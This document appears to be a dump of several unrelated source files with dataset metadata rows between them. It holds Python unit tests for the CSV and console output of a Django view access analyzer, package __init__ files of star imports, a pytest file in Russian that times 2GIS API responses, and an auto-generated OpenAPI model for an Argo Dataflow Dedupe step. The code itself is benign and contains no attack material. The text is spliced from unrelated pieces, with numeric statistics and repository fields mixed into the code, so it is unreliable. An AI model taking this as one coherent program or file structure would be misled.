self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_write_correct_csv_columns(
self
):
expected = u'App Name,Type,View Name,Url,Status,Status description'
self._output.set_format('csv')
self._output.write_end_of_head()
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_process_app_data_to_stdout_with_SUCCESS_style(self):
app_name = u'fake-app-name'
app_type = u'fake-app-type'
view_list = ['fake-view']
expected = u'\tAnalyzing: {}\n'.format(app_name)
expected += u'\t\t{} is {} type.'.format(app_name, app_type)
self._output.process_application_data(app_name, app_type, view_list)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_process_app_data_without_type(self):
app_name = u'fake-app-name'
app_type = None
view_list = ['fake-view']
expected = u'\tAnalyzing: {}\n'.format(app_name)
expected += u'\t\t{} has no type.'.format(app_name)
self._output.process_application_data(app_name, app_type, view_list)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_process_app_data_without_views(self):
app_name = u'fake-app-name'
app_type = u'fake-app-type'
view_list = []
expected = u'\tAnalyzing: {}\n'.format(app_name)
expected += u'\t\t{} is {} type.'.format(app_name, app_type)
expected += u'\t\t{} does not have configured views.'.format(app_name)
self._output.process_application_data(app_name, app_type, view_list)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_process_application_data_to_string(self):
app_name = u'fake-app-name'
app_type = u'fake-app-type'
view_list = ['fake-view-list']
expected = u'{},{},'.format(app_name, app_type)
self._output.set_format('csv')
self._output.process_application_data(app_name, app_type, view_list)
self.assertEqual(expected, self._output._row)
def test_csv_format_process_application_data_without_type_to_string(self):
app_name = u'fake-app-name'
app_type = None
view_list = ['fake-view-list']
expected = u'fake-app-name,no type,'
self._output.set_format('csv')
self._output.process_application_data(app_name, app_type, view_list)
self.assertEqual(expected, self._output._row)
def test_csv_format_process_application_data_without_views(self):
app_name = u'fake-app-name'
app_type = u'fake-app-type'
view_list = []
expected = u'fake-app-name,fake-app-type,,,,,'
self._output.set_format('csv')
self._output.process_application_data(app_name, app_type, view_list)
self.assertEqual(expected, self._output._row)
def test_console_format_process_view_data_to_stdout_with_SUCCESS_style(
self
):
view_name = u'fake-view-name'
url = '/fake-url/'
expected = u'\n\t\tAnalysis for view: {}'.format(view_name)
expected += u'\n\t\tView url: {}'.format(url)
self._output.process_view_data(view_name, url)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_cvs_format_process_view_data(self):
view_name = u'fake-view-name'
url = '/fake-url/'
expected = u'{},{}'.format(view_name, url)
self._output.set_format('csv')
self._output.process_view_data(view_name, url)
self.assertIn(expected, self._output._row)
# View_access_analyzer output.
def test_console_format_write_vaa_to_stdout(self):
self._output.write_view_access_analyzer(u'some text')
assert self.mock_stdout.write.called
def test_console_format_use_stdout_write_once_with_vaa(self):
self._output.write_view_access_analyzer(u'some text')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_use_SUCCESS_style_for_styling_output_of_vaa(self):
self._output.write_view_access_analyzer(u'some text')
self.mock_stdout.write.assert_called_once_with(
self.mock_style.SUCCESS())
def test_console_format_use_SUCCESS_style_for_output_of_vaa(self):
self._output.write_view_access_analyzer(u'some text')
assert self.mock_style.SUCCESS.called
def test_console_format_use_style_with_vaa_result(self):
self._output.write_view_access_analyzer(u'some text')
self.mock_style.SUCCESS.assert_called_once_with(u'\t\tsome text')
def test_console_format_use_ERROR_style_for_output_if_error_in_vaa(self):
self._output.write_view_access_analyzer('ERROR: fake report')
assert self.mock_style.ERROR.called
def test_console_format_use_ERROR_style_with_the_error_in_vaa(self):
self._output.write_view_access_analyzer('ERROR: fake report')
self.mock_style.ERROR.assert_called_once_with('\t\t' +
'ERROR: fake report')
def test_console_format_use_WARNING_style_for_output_if_warning_in_vaa(self):
self._output.write_view_access_analyzer('WARNING: fake report')
assert self.mock_style.WARNING.called
def test_console_format_use_WARNING_style_with_the_warning_in_vaa(self):
self._output.write_view_access_analyzer('WARNING: fake report')
self.mock_style.WARNING.assert_called_once_with(
'\t\t' + 'WARNING: fake report')
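# CSV mode builds each report line incrementally: add_to_row accumulates
# 'app,type,view,url,', write_view_access_analyzer appends the status and
# report text, emits the full row, then resets _row to the 'app,type,' prefix
# for the next view of the same application.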
def test_csv_format_write_view_access_analyzer_with_Normal_to_stdout(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
self._output._format = 'csv'
self._output.write_view_access_analyzer(u'fake-report')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_write_view_access_analyzer_with_Normal_to_style(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
expected = u'fake-app,fake-type,fake-view,fake-url,Normal,fake-report\n'
self._output._format = 'csv'
self._output.write_view_access_analyzer(u'fake-report')
self.mock_style.SUCCESS.assert_called_once_with(expected)
def test_csv_format_write_view_access_analyzer_with_WARNING_to_stdout(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
self._output._format = 'csv'
self._output.write_view_access_analyzer('WARNING: fake-report')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_write_view_access_analyzer_with_WARNING_with_style(
self
):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
expected = u'fake-app,fake-type,fake-view,fake-url,Warning,' \
u'fake-report\n'
self._output._format = 'csv'
self._output.write_view_access_analyzer('WARNING: fake-report')
self.mock_style.WARNING.assert_called_once_with(expected)
def test_csv_format_write_view_access_analyzer_with_ERROR_to_stdout(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
self._output._format = 'csv'
self._output.write_view_access_analyzer('ERROR: fake-report')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_write_view_access_analyzer_with_ERROR_with_style(self):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
expected = u'fake-app,fake-type,fake-view,fake-url,Error,fake-report\n'
self._output._format = 'csv'
self._output.write_view_access_analyzer('ERROR: fake-report')
self.mock_style.ERROR.assert_called_once_with(expected)
def test_csv_format_write_view_access_analyzer_reset_OutputFormater_row(
self
):
self._output.add_to_row('fake-app,fake-type,fake-view,fake-url,')
self._output._format = 'csv'
self._output.write_view_access_analyzer('fake-report')
self.assertEqual(self._output._row, u'fake-app,fake-type,')
def test_console_format_close_application_data_to_stdout_with_SUCCESS_style(
self
):
expected = u'\tFinish analyzing fake-app-name.'
self._output.close_application_data('fake-app-name')
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_close_application_data_to_string(self):
expected = u''
self._output.set_format('csv')
self._output.close_application_data('fake-app-name')
self.assertEqual(self._output._row, expected)
def test_console_format_write_footer_to_stdout_with_SUCCESS_style(self):
expected = u'End checking view access.'
self._output.write_footer()
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_write_footer_to_string(self):
expected = u'\n'
self._output.set_format('csv')
self._output.write_footer()
self.assertEqual(self._output._row, expected)
| 40.453802 | 85 | 0.661607 | 6,086 | 49,475 | 5.007394 | 0.048308 | 0.054471 | 0.033667 | 0.04187 | 0.844594 | 0.803774 | 0.76653 | 0.738113 | 0.702215 | 0.680558 | 0 | 0.004132 | 0.241839 | 49,475 | 1,222 | 86 | 40.486907 | 0.808318 | 0.009581 | 0 | 0.662439 | 0 | 0.001951 | 0.162688 | 0.065692 | 0 | 0 | 0 | 0 | 0.136585 | 1 | 0.142439 | false | 0.006829 | 0.01561 | 0 | 0.182439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
e6990f7310e89eaf51795fa05ea2ca52396ff9f9
| 161 |
py
|
Python
|
utils/__init__.py
|
wang97zh/EVS-Net-1
|
3a8457c2d5281b8805ec523f9ced738ccf49d5f5
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
wang97zh/EVS-Net-1
|
3a8457c2d5281b8805ec523f9ced738ccf49d5f5
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
wang97zh/EVS-Net-1
|
3a8457c2d5281b8805ec523f9ced738ccf49d5f5
|
[
"MIT"
] | null | null | null |
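# Package-level re-exports: star-importing each submodule below lets callers
# write `from utils import <name>` without knowing which submodule defines it.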
from .utility import *
from .tricks import *
from .tensorlog import *
from .self_op import *
from .resume import *
from .optims import *
from .metric import *
| 16.1 | 24 | 0.726708 | 22 | 161 | 5.272727 | 0.454545 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186335 | 161 | 9 | 25 | 17.888889 | 0.885496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
fc0db1d4c1d538c8a8da3398414e346edd37ebe8
| 166 |
py
|
Python
|
client/checkout/schema/types.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | 6 |
2019-11-21T10:09:49.000Z
|
2021-06-19T09:52:59.000Z
|
client/checkout/schema/types.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | null | null | null |
client/checkout/schema/types.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | null | null | null |
import graphene
from graphene_django import DjangoObjectType
from graphene_django.converter import convert_django_field
from pyuploadcare.dj.models import ImageField
| 33.2 | 58 | 0.89759 | 21 | 166 | 6.904762 | 0.571429 | 0.165517 | 0.248276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084337 | 166 | 4 | 59 | 41.5 | 0.953947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
fc321e4d24702ee71bce5b7e534a97061ead9698
| 2,950 |
py
|
Python
|
tests/test_01_accept_time_get_headers.py
|
glushkovvv/test_2gis
|
2affff49411a3c7ff77e9d399ec86eb314aa3757
|
[
"MIT"
] | null | null | null |
tests/test_01_accept_time_get_headers.py
|
glushkovvv/test_2gis
|
2affff49411a3c7ff77e9d399ec86eb314aa3757
|
[
"MIT"
] | 1 |
2020-08-05T06:27:23.000Z
|
2020-08-05T06:27:42.000Z
|
tests/test_01_accept_time_get_headers.py
|
glushkovvv/test_2gis
|
2affff49411a3c7ff77e9d399ec86eb314aa3757
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
test_01_accept_time_get_headers
~~~~~~~~~~~~~~
The 2GIS API Test
Check response times for GET requests
:author: Vadim Glushkov
:copyright: Copyright 2019, The 2GIS API Test
:license: MIT
:version: 1.0.0
:maintainer: Vadim Glushkov
:email: plussg@yandex.ru
:status: Development
"""
import pytest
import allure
from tools.api_responses import get_response
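# Note: requests' Response.elapsed measures the time from sending the request
# until the response headers are parsed, so the 0.2 s / 0.5 s budgets asserted
# below do not include body download time.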
@allure.epic("Поизитивные тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 5},
{"country_code": "ru", "page": 1, "page_size": 5},
{"q": "ОРСК"}])
def test_01_time_response_for_valid_request(setup_option, json_params):
"""
Проверяем время ответов сервера при валидных запросах
:param setup_option: Установочные параметры
:type setup_option: dict
:param json_params: Параметры GET запроса
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.2
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.2 сек\r\n""" + testing_message
@allure.epic("Смок тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 2},
{"country_code": "tz", "page": 1, "page_size": 5},
{"q": "ОР"}])
def test_01_time_response_for_invalid_request(setup_option, json_params):
"""
Проверяем время ответов сервера при невалидных запросах
:param setup_option: Установочные параметры
:type setup_option: dict
:param json_params: Параметры GET запроса
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.5
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.5 сек\r\n""" + testing_message
| 38.815789 | 116 | 0.649831 | 364 | 2,950 | 5.049451 | 0.293956 | 0.083787 | 0.019587 | 0.028292 | 0.800326 | 0.779108 | 0.73667 | 0.73667 | 0.73667 | 0.73667 | 0 | 0.014141 | 0.232881 | 2,950 | 75 | 117 | 39.333333 | 0.798056 | 0.231864 | 0 | 0.514286 | 0 | 0 | 0.391682 | 0.102377 | 0 | 0 | 0 | 0 | 0.057143 | 1 | 0.057143 | false | 0 | 0.085714 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
fc526e31f18c99d7210b6012a52b4a8ccf202ae9
| 35 |
py
|
Python
|
instascrape/collectors/__init__.py
|
Paola351/instascrape
|
b4a50c9140fa9054187738f6d1564cecc32cbaab
|
[
"MIT"
] | 1 |
2021-03-10T03:36:43.000Z
|
2021-03-10T03:36:43.000Z
|
examples/collectors/__init__.py
|
fo0nikens/instascrape
|
699dd2169a96438d1d71bce5b1401fd5c5f0e531
|
[
"MIT"
] | null | null | null |
examples/collectors/__init__.py
|
fo0nikens/instascrape
|
699dd2169a96438d1d71bce5b1401fd5c5f0e531
|
[
"MIT"
] | null | null | null |
from .interval_collectors import *
| 17.5 | 34 | 0.828571 | 4 | 35 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
fc652ca3b217323de609509cf9bf7a86e05a1571
| 28 |
py
|
Python
|
disrank/__init__.py
|
treehousekingcomic/disrank
|
6a6ef3a2f2d4dc81bc3da8064b897dac4c773ef7
|
[
"MIT"
] | 1 |
2021-05-06T14:46:46.000Z
|
2021-05-06T14:46:46.000Z
|
disrank/__init__.py
|
treehousekingcomic/disrank
|
6a6ef3a2f2d4dc81bc3da8064b897dac4c773ef7
|
[
"MIT"
] | null | null | null |
disrank/__init__.py
|
treehousekingcomic/disrank
|
6a6ef3a2f2d4dc81bc3da8064b897dac4c773ef7
|
[
"MIT"
] | null | null | null |
from thkc_disrank import *
| 14 | 27 | 0.785714 | 4 | 28 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178571 | 28 | 1 | 28 | 28 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
fc933a1a213897fe8cf98ce98bd1c72358bf800c
| 16,945 |
py
|
Python
|
sdks/python/client/openapi_client/model/github_com_argoproj_labs_argo_dataflow_api_v1alpha1_dedupe.py
|
Siebjee/argo-workflows
|
1a3b87bdf8edba02ba5e5aed20f3942be1d6f46c
|
[
"Apache-2.0"
] | null | null | null |
sdks/python/client/openapi_client/model/github_com_argoproj_labs_argo_dataflow_api_v1alpha1_dedupe.py
|
Siebjee/argo-workflows
|
1a3b87bdf8edba02ba5e5aed20f3942be1d6f46c
|
[
"Apache-2.0"
] | 3 |
2022-02-22T19:39:40.000Z
|
2022-02-28T14:34:19.000Z
|
sdks/python/client/openapi_client/model/github_com_argoproj_labs_argo_dataflow_api_v1alpha1_dedupe.py
|
Siebjee/argo-workflows
|
1a3b87bdf8edba02ba5e5aed20f3942be1d6f46c
|
[
"Apache-2.0"
] | null | null | null |
"""
Argo Server API
You can get examples of requests and responses by using the CLI with `--gloglevel=9`, e.g. `argo list --gloglevel=9` # noqa: E501
The version of the OpenAPI document: VERSION
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from openapi_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from openapi_client.exceptions import ApiAttributeError
def lazy_import():
from openapi_client.model.github_com_argoproj_labs_argo_dataflow_api_v1alpha1_abstract_step import GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep
globals()['GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep'] = GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep
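# Deferred import: generated models import referenced schemas lazily (and
# publish them via globals()) to avoid circular imports between model modules.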
class GithubComArgoprojLabsArgoDataflowApiV1alpha1Dedupe(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'abstract_step': (GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep,), # noqa: E501
'max_size': (str,), # noqa: E501
'uid': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'abstract_step': 'abstractStep', # noqa: E501
'max_size': 'maxSize', # noqa: E501
'uid': 'uid', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""GithubComArgoprojLabsArgoDataflowApiV1alpha1Dedupe - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
abstract_step (GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep): [optional] # noqa: E501
max_size (str): Quantity is a fixed-point representation of a number. It provides convenient marshaling/unmarshaling in JSON and YAML, in addition to String() and AsInt64() accessors. The serialization format is: <quantity> ::= <signedNumber><suffix> (Note that <suffix> may be empty, from the \"\" case in <decimalSI>.) <digit> ::= 0 | 1 | ... | 9 <digits> ::= <digit> | <digit><digits> <number> ::= <digits> | <digits>.<digits> | <digits>. | .<digits> <sign> ::= \"+\" | \"-\" <signedNumber> ::= <number> | <sign><number> <suffix> ::= <binarySI> | <decimalExponent> | <decimalSI> <binarySI> ::= Ki | Mi | Gi | Ti | Pi | Ei (International System of units; See: http://physics.nist.gov/cuu/Units/binary.html) <decimalSI> ::= m | \"\" | k | M | G | T | P | E (Note that 1024 = 1Ki but 1000 = 1k; I didn't choose the capitalization.) <decimalExponent> ::= \"e\" <signedNumber> | \"E\" <signedNumber> No matter which of the three exponent forms is used, no quantity may represent a number greater than 2^63-1 in magnitude, nor may it have more than 3 decimal places. Numbers larger or more precise will be capped or rounded up. (E.g.: 0.1m will rounded up to 1m.) This may be extended in the future if we require larger or smaller quantities. When a Quantity is parsed from a string, it will remember the type of suffix it had, and will use the same type again when it is serialized. Before serializing, Quantity will be put in \"canonical form\". This means that Exponent/suffix will be adjusted up or down (with a corresponding increase or decrease in Mantissa) such that: a. No precision is lost b. No fractional digits will be emitted c. The exponent (or suffix) is as large as possible. The sign will be omitted unless the number is negative. Examples: 1.5 will be serialized as \"1500m\" 1.5Gi will be serialized as \"1536Mi\" Note that the quantity will NEVER be internally represented by a floating point number. That is the whole point of this exercise. Non-canonical values will still parse as long as they are well formed, but will be re-emitted in their canonical form. (So always use canonical form, or don't diff.) This format is intended to make it difficult to use these numbers without writing some sort of special handling code in the hopes that that will cause implementors to also use a fixed point implementation.. [optional] # noqa: E501
uid (str): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""GithubComArgoprojLabsArgoDataflowApiV1alpha1Dedupe - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
abstract_step (GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep): [optional] # noqa: E501
max_size (str): Quantity is a fixed-point representation of a number. It provides convenient marshaling/unmarshaling in JSON and YAML, in addition to String() and AsInt64() accessors. The serialization format is: <quantity> ::= <signedNumber><suffix> (Note that <suffix> may be empty, from the \"\" case in <decimalSI>.) <digit> ::= 0 | 1 | ... | 9 <digits> ::= <digit> | <digit><digits> <number> ::= <digits> | <digits>.<digits> | <digits>. | .<digits> <sign> ::= \"+\" | \"-\" <signedNumber> ::= <number> | <sign><number> <suffix> ::= <binarySI> | <decimalExponent> | <decimalSI> <binarySI> ::= Ki | Mi | Gi | Ti | Pi | Ei (International System of units; See: http://physics.nist.gov/cuu/Units/binary.html) <decimalSI> ::= m | \"\" | k | M | G | T | P | E (Note that 1024 = 1Ki but 1000 = 1k; I didn't choose the capitalization.) <decimalExponent> ::= \"e\" <signedNumber> | \"E\" <signedNumber> No matter which of the three exponent forms is used, no quantity may represent a number greater than 2^63-1 in magnitude, nor may it have more than 3 decimal places. Numbers larger or more precise will be capped or rounded up. (E.g.: 0.1m will rounded up to 1m.) This may be extended in the future if we require larger or smaller quantities. When a Quantity is parsed from a string, it will remember the type of suffix it had, and will use the same type again when it is serialized. Before serializing, Quantity will be put in \"canonical form\". This means that Exponent/suffix will be adjusted up or down (with a corresponding increase or decrease in Mantissa) such that: a. No precision is lost b. No fractional digits will be emitted c. The exponent (or suffix) is as large as possible. The sign will be omitted unless the number is negative. Examples: 1.5 will be serialized as \"1500m\" 1.5Gi will be serialized as \"1536Mi\" Note that the quantity will NEVER be internally represented by a floating point number. That is the whole point of this exercise. Non-canonical values will still parse as long as they are well formed, but will be re-emitted in their canonical form. (So always use canonical form, or don't diff.) This format is intended to make it difficult to use these numbers without writing some sort of special handling code in the hopes that that will cause implementors to also use a fixed point implementation.. [optional] # noqa: E501
uid (str): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
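# Record this class in the visited set so a composed (allOf/discriminator)
# schema is only traversed once per instantiation chain (see docstring above).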
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
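# Assign the remaining kwargs as model attributes. Unknown keys are
# dropped only when the configuration requests it and the model declares
# no additionalProperties; read-only attributes are rejected below.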
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
